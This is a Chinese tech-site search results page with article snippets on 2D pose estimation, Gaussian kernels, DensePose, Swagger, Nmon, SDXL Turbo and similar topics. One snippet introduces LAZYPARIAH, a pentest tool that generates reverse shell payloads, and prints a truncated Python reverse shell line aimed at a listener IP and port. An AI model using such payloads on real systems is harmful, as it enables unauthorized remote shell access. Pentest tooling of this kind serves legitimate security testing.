首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏量子位

    密集人体姿态估计:2D图像帧可实时生成UV贴图(附论文)

    2月1号,法国国立计算机及自动化研究院和FAIR共同在ArXiv上发表了一篇可实时2D图像转成UV贴图(3D展开的表面)的论文。 ? 贴图的人工标注的效率 以往把2D图像转成3D模型的表面贴图时,都需要人工去旋转,工作量太大。 现在重新设计了2D转3D贴图的处理流程。现在只需要两步就可以完成。 首先,采用Top-down的方式,把图像中的人体按身体部位划分区域。 ? 这两步,身体部位划分和等距点对应标注可以同时进行,可以获得很高的2D转3D一致性。此次研究,收集了5万人案例的标注数据,以及500多万个手动标注的对应点。 如下所示,在ROI池的基础上引入一个全卷积网络,有两个目的: 针对每个选定的身体部位,生成每个像素的分类结果; 对于每个部分使用回归本地坐标。

    1.8K70发布于 2018-03-21
  • 来自专栏又见苍岚

    Python 生成 2D 高斯核

    本文记录 Python 中二维高斯核的生成方法。 生成思路 使用 cv2.getGaussianKernel(ksize, sigma[, ktype]) 函数 该函数用于生成一维高斯核 生成一维高斯核后乘以自己的转置得到二维高斯核 核心函数 cv2 .getGaussianKernel(ksize, sigma[, ktype]) ,函数生成一维高斯核 官方函数文档 参数说明 参数 描述 限制 ksize 核尺寸(文档中要求奇数 ,使用时可以是偶数) 正整数 sigma 高斯函数的标准差 正数 ktype 滤波器系数的类型,可以是 cv2.CV_32f 或 cv2.CV_64f,配置参数后生成数据会分别表示为 float32 mathrm{G}_{\mathrm{i}}=\alpha * e^{-(\mathrm{i}-(\mathrm{ksize}-1) / 2)^{2} /(2 * \mathrm{sigma})^{2}} 生成方法

    3K20编辑于 2022-08-06
  • 来自专栏Creator星球游戏开发社区

    开源 2D 实时水面反射效果,源码详解!

    引言:插件 Easy NavMesh、BenchMark 性能检测的作者孙二喵,从开发者王师傅的论坛分享中获得启发,实现了 2D 实时水面反射效果,Demo 免费开源。 2D 实时水面反射 Demo 效果 资源地址: https://store.cocos.com/app/detail/3900 功能特点 整个方案使用了3个摄像机: RT 摄像机负责所有游戏物体,它会获取 作者花式使用噪声图实现了 2D 水面波浪效果,这也是上文孙二喵 Demo 的方案参考,感兴趣的小伙伴可以阅读一下。

    99721编辑于 2023-02-23
  • mediapipe的人脸mesh实时生成

    import mediapipe as mp import cv2 import numpy as np import time

    48000编辑于 2025-07-19
  • CodeBuddy Craft 自动生成实时汇率网站

    在功能层面,CodeBuddy Craft 拥有强大的自然语言处理能力,开发者只需用日常语言描述需求,比如 “我想开发一个带有用户评论功能的电商产品详情页”,它就能迅速理解意图,自主完成多文件代码的生成与改写 像常见的软件功能页面,如任务看板、提醒设置、统计图表等,对它而言都不在话下,生成的项目结构规范,代码清晰且具备良好的可拓展性。 使用案例接下来我将使用 CodeBuddy Craft 结合TAPD MCP Server 开发一个实时汇率计算网站一、创建一个文件夹,在Craft下输入“生成实时汇率计算网站”创建完成后效果如下,是一个纯前端页面简单测试后 ,公网可以访问”推送到github成功后,地址https://github.com/zhengjianhong001/currency-converter接下来到github page简单保存下,即可生成可访问的链接

    1.1K20编辑于 2025-05-13
  • 来自专栏媒矿工厂

    2D 扩散模型 + Nerf,实现文本生成 3D 模型

    项目主页:https://dreamfusion3d.github.io/ 论文链接:https://arxiv.org/pdf/2209.14988.pdf 内容整理:王炅昊 本论文把近期发展火热的2D 在这项工作中,作者通过使用预训练的 2D 文本-图像的扩散模型,实现文本到 3D 合成。他们引入了基于概率密度蒸馏的损失函数,这也允许了2D扩散模型作为先验,用以优化参数图像生成器。 在类似 DeepDream 的过程中使用这种损失函数,作者通过梯度下降优化随机初始化的 3D 模型(NeRF),使其从随机角度的 2D 渲染均能让损失函数值较低。 引入:扩散模型 扩散模型是隐变量生成模型,它学习将样本从易处理的噪声分布逐渐转换为数据分布的过程,他由一个正向过程 q 和一个反向过程或生成模型 p 组成。 下图中给出了该采样方案与扩散模型采样的对比: 这里,作者使用了简单的生成函数 \mathbf{x}=(\operatorname{flip}(\theta), \theta) 作演示(也即生成一个对称的图片

    3.1K20编辑于 2022-11-07
  • 来自专栏腾讯云智能顾问

    【云顾问-数字资产】改进报告生成流程,实时感知生成时长

    功能介绍鼠标悬停至【生成报告】按钮时,即可预览报告生成的简要概况点击【生成报告】按钮后,顶部将实时显示生成过程的计时器,让您清晰、直观地感知报告生成进度报告生成完毕后,点击【查看】按钮,即可查阅生成的临时报告 ❓ FAQ报告生成的简要概况描述的是什么? 简要概况描述了您当前生成报告的时间节点,以及是通过手动巡检or自动巡检生成,这两者的区别在于:手动巡检:在您当日手动完成巡检后,再去发起生成报告,具有较高的实时性自动巡检:在每天凌晨12点,系统会自动对所有架构图进行巡检 ,以便您能快速生成报告此外,您还可以通过点击架构图右上角的【订阅】按钮或点击链接报告订阅,订阅每日巡检结果到您的邮箱,掌握最新资源风险动态我在生成过程中关闭提示窗口会影响生成进展吗? 关闭正在生成中的消息窗口不会影响报告的生成过程,报告生成完毕后,将会通过气泡提示的方式通知您生成完毕后,我该做什么?当前生成的报告为临时报告。

    25910编辑于 2024-11-19
  • 来自专栏大宇笔记

    Quartz 2D

    Quartz 2D 是iOS 和Mac OS X中的二维绘图引擎。我们可以利用Quartz 2D API画出想要的图形效果。 如:路径图,画与透明度,阴影,阴影,透明层,颜色管理,反锯齿的渲染,生成PDF文档和PDF文件元数据的访问。 谁应该阅读本文档? 在一个应用程序中提供图形编辑功能 创建或显示位图图像 使用PDF文档 Organization of This Document 本文档分为以下章节: Overview of Quartz 2D Data Management in Quartz 2D discusses how to move data into and out of Quartz. Text describes Quartz 2D low-level support for text and glyphs, and alternatives that provide higher-level

    65810编辑于 2022-06-02
  • 来自专栏FreeBuf

    如何使用LAZYPARIAH实时生成反向Shell Payload

    关于LAZYPARIAH LAZYPARIAH是一款功能强大的命令行工具,该工具依赖的组件并不多,但是却可以帮助广大研究人员在渗透测试过程中利用命令行接口实时生成反向Shell Payload。 LAZYPARIAH基于纯Ruby开发,是一款简单实用、易于安装且功能强大的命令行工具,该工具可以在渗透测试或CTF夺旗比赛过程中,实时生成大量反向Shell Payload。 LAZYPARIAH支持的反向Shell Payload包括但不限于下列形式: 1、C代码Payload(实时编译):c_binary 2、Ruby Payload:ruby、ruby_b64、ruby_hex 、PowerShell Payload:powershell_c、powershell_b64 4、Base64编码Python Payload:python_b64 5、Rust代码Payload(实时编译 例如,“lazypariah python_c 10.10.14.4 1337”命令将会生成下列输出: python -c 'import socket,subprocess,os;s=socket.socket

    1K20编辑于 2022-06-08
  • 来自专栏老张的求知思考世界

    Nmon实时监控并生成HTML监控报告

    之前的文章介绍了服务端监控工具:Nmon使用方法,最近在github找到了一个nmon自动监控并生成HTML格式报告的工具:easyNmon,使用体验蛮不错的,这里介绍下它的安装及使用方法。 easyNmon说明 说明:为了方便多场景批量监控,作者用golang写了个监控程序,可以通过web页面启动和停止nmon服务, 适配Loadrunner和jmeter进行性能测试,可以做到批量执行场景并生成监控报告 解压后会生成一个easyNmon文件夹,进入该文件夹,通过命令 ./monitor& 启动easyNmon服务(后缀加&为后台运行)。 2、常用信息查看 在easyNmon目录下,输入 . 四、HTML格式监控报告 PS:压测脚本结束后,默认生成监控报告,手动停止测试脚本,也会自动生成监控报告,可以通过访问web页面的报告页面查看,如下图: 1、grafana测试结果 ?

    2.2K30发布于 2019-12-02
  • 来自专栏Java探索之路

    Swagger技术(接口文档实时动态生成工具)

    Swagger(接口文档实时动态生成工具 一、Swagger 简介 出现背景 Open API Swagger 简介 二、Springfox 三、Swagger 用法 1.编写SpringBoot 如果接口文档可以实时动态生成就不会出现上面问题。 Swagger 可以完美的解决上面的问题。 然后,文档生成工具可以使用OpenAPI 定义来显示API, 使用各种编程语言生成服务器和客户端的代码生成工具,测试工具以及许多其他用例。 类似Markdown 具有实时预览描述文件的功能。 Swagger UI: 将Open API 规范呈现为交互式API 文档。用可视化UI 展示描述文件。 -- 接口文档可以实时动态生成工具Swagger --> <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-swagger2

    17K22发布于 2020-07-24
  • 来自专栏AI算法与图像处理

    草图实时生成动漫角色!太秀了

    得到以下: 图片来源:https://zhuanlan.zhihu.com/p/38411618 但是从作者提供的demo来看,效果还是蛮好的 例如对于发型控制(刘海和纹理等调整),都有比较高质量的生成效果 以及对眼睛和嘴巴的张合控制(眼睛从小变换到大): 很期待作者能够开源出来给大家一起玩耍 之前也分享过图像翻译的最新工作,ICCV 2021 上的一份非常惊艳的工作, DeepSim (代码开源哦) 作者描述 尝试从草图实时自动生成插图

    1.1K40编辑于 2022-02-10
  • 来自专栏量子位

    DensePose开源了,2D变3D人体姿势实时识别 | Facebook@CVPR 2018

    大家可能还记得,今年2月Facebook发布的,人体姿势实时识别系统DensePose。 现在,代码开源了。撒花。 100人也很轻松 DensePose,这项技术可以把2D图像,转换成3D人体模型,并已成功跻身今年CVPR的Oral环节。 ? 2D转3D的速度和准确度,有希望为AR/VR这样的应用提供加持。 数据集叫COCO 这样的成就,DensePose-COCO功勋卓著。 这是一个大规模的参考标准 (Ground Truth) 数据集。

    1.2K20发布于 2018-07-24
  • 谷歌MusicFX DJ:实时AI音乐生成技术解析

    界面提供了实时的推子式控制,用于调节强度、“混沌度”和密度等参数,让用户在音乐播放时进行塑形。这种实时交互性以及48 kHz的高质量立体声输出,使其区别于早期的静态生成工具。 实时适应(Lyria RealTime):标准的Lyria模型根据提示生成一个完整的音频片段。Lyria RealTime对此过程进行了修改,以实现流式生成。 它可能在一个连续循环中生成短小的、有重叠的音频片段,同时一个独立的控制过程根据用户的实时输入(更改提示、滑动推子)动态调整生成参数。这使得无缝过渡和实时混音成为可能。 对于数据科学家来说,这突显了用户体验设计和实时系统思维在将人工智能带给广大受众时的重要性。实时可控生成:从批量推理转向实时、交互式生成是一个重大的技术挑战。 对于数据科学家而言,它是在实时人工智能系统设计、模型条件生成以及生成技术商业化方面的一个引人入胜的案例研究。

    26810编辑于 2026-03-22
  • 来自专栏软件安装

    视频转文字、双字幕生成实时翻译推荐

    ▌引言 之前给大家分享过不少视频转文字、字幕生成实时翻译的工具,但有一类工具一直没提到,就是给视频生成字幕后,顺便翻译成中文字幕文件。 不过视频生成速度快,比较适合把国外视频搬运翻译到国内短视频平台上。 用Potplayer打开生肉视频,右键选择字幕→生成有声字幕→生成有声字幕。 设置好转换引擎、型号、语言这些参数后,点开始生成就行。 很快本地就会出现一份带时间轴但没翻译的字幕文件。 然后播放视频,加载字幕文件,把实时字幕翻译功能打开。 按Potplayer的倍速快捷键(默认是C键)把视频倍速播放。 视频播放的时候,字幕文件会不断实时翻译。 完事后就简单了,依次点击Potplayer设置→字幕→保存字幕→勾选上"保持字幕同时保持翻译"。 然后点另存字幕为,或者按默认快捷键Ctrl+Alt+S。

    69410编辑于 2026-03-26
  • 来自专栏机器学习算法与理论

    PAF基于PAF(部分亲和字段)的实时多人2D姿态估计-CMU_openpose

    在本文中,文章通过实时算法来检测图像中多个人的二维姿态。 文章提出了关键点关联的明确的非参数表示,其编码人体肢体的位置和方向。 其次,设计了一个联合学习身体部分检测和身体部分关联的框架。 然后根据PAF生成一系列的偶匹配,由于PAF自身的矢量性,使得生成的偶匹配很正确,最终合并为一个人的整体骨架。 关键点定位:在图像有多少能识别多少就定位多少,把已经有的点进行个体关联。 系统采用尺寸为w×h的彩色图像(图2a)作为输入,并生成图像中每个人的解剖关键点的2D位置(图2e)作为输出。 ? 在L c中的位置编码2D矢量(如图1所示)。 最后,通过贪心推理(图2d)分析置信度图和亲和度字段,为图像中的所有人输出二维关键点。 图像首先由卷积网络分析(由VGG-19的前10层初始化并被微调),生成一组输入到每个分支的第一阶段的特征图F.

    2.2K60发布于 2018-04-10
  • 来自专栏AI研习社

    AI 实时生成材质,效果直逼好莱坞大片

    而且,我们的卷积神经网络可以提供这些图像的实时预测结果,这些预测与真正的渲染图像难以分辨,并且实时生成。 除了这个流程,我们还结合了三种强大的学习算法,从而为实时的逼真材质可视化,颜色探索,以及二维隐空间微调提供了可能,我们相信这个特征设置为大批量材质合成提供了有用的解决方案,无论是对于新手还是专家来说,都希望未来将多种先进算法

    1.2K20发布于 2018-07-26
  • 来自专栏技术成长

    SDXL Turbo实时文本到图像生成模型

    SDXL Turbo 通过新的蒸馏技术实现了最先进的性能,能够以前所未有的质量生成单步图像,将所需的步骤数从 50 减少到仅 1。该技术利用对抗性训练和分数蒸馏的组合。 SDXL Turbo 基于一种称为对抗扩散蒸馏 (ADD) 的新颖蒸馏技术,该技术使模型能够一步合成图像输出并生成实时文本到图像输出,同时保持高采样保真度。 通过整合 ADD,SDXL Turbo 获得了与 GAN(生成对抗网络)共有的许多优势,例如单步图像输出,同时避免了其他蒸馏方法中常见的伪影或模糊。 与其他扩散模型相比的性能优势为了选择 SDXL Turbo,我们通过使用相同的提示生成输出来比较多个不同的模型变体(StyleGAN-T++、OpenMUSE、IF-XL、SDXL 和 LCM-XL)。 在 A100 上,SDXL Turbo 在 207 毫秒内生成 512x512 图像(即时编码 + 单个去噪步骤 + 解码,fp16),其中单个 UNet 前向评估占用了 67 毫秒。

    58021编辑于 2023-12-01
  • 来自专栏FreeBuf

    如何使用LiveTargetsFinder生成实时活动主机URL列表

    关于LiveTargetsFinder LiveTargetsFinder 是一款功能强大的实时活动主机生成工具,该工具可以为广大研究人员以自动化的形式生成可供分析和测试的实时活动主机 URL 列表 接下来,该脚本将会生成一个完整的URL列表,其中将包含可访问的域名信息和可以抵达的IP地址,随后可以将其发送到gobuster或dirsearch等工具,或发送HTTP请求。 值得一提的是,该工具还支持将生成的主机信息发送到Nmap上进行扫描,以在早起验证目标主机是否可访问或是否已启动,并根据打开的端口收集服务信息。 最后,工具将解析这些结果并生成实时主机列表。 工具安装 注意:如果你要使用Nmap扫描选项,则需要先安装好Nmap。除此之外,MassDNS和Masscan是必须安装的工具组件。 /masscan/bin/masscan 否 --nmap 针对生成的活动主机执行Nmap版本检测扫描 Disabled 否 --db-path 如果使用了--nmap选项,则需要提供需要添加的数据库路径

    2.4K30编辑于 2022-11-14
  • 来自专栏量子位

    打开摄像头,2D插画实时变动画,中国程序媛出品,Demo在线可玩

    作者介绍,Pose Animator是基于PoseNet和FaceMesh这两个TensorFlow.js模型的识别结果,来对2D矢量图及其骨架进行实时动画处理的。 在Pose Animator中,蒙皮由输入SVG文件中的2D矢量路径定义。 并且,Pose Animator提供了基于PoseNet和FaceMesh设计的、预设好的骨骼层次结构表示。 ? 而其后实时的骨骼位置,则根据机器学习模型的识别结果进行更新。 目前,作者已经推出两个网页Demo。 一个能根据你镜头实时捕捉到的画面,让2D图像动起来。 ? 另一个则针对静态图像。 ?

    89810发布于 2020-05-19
领券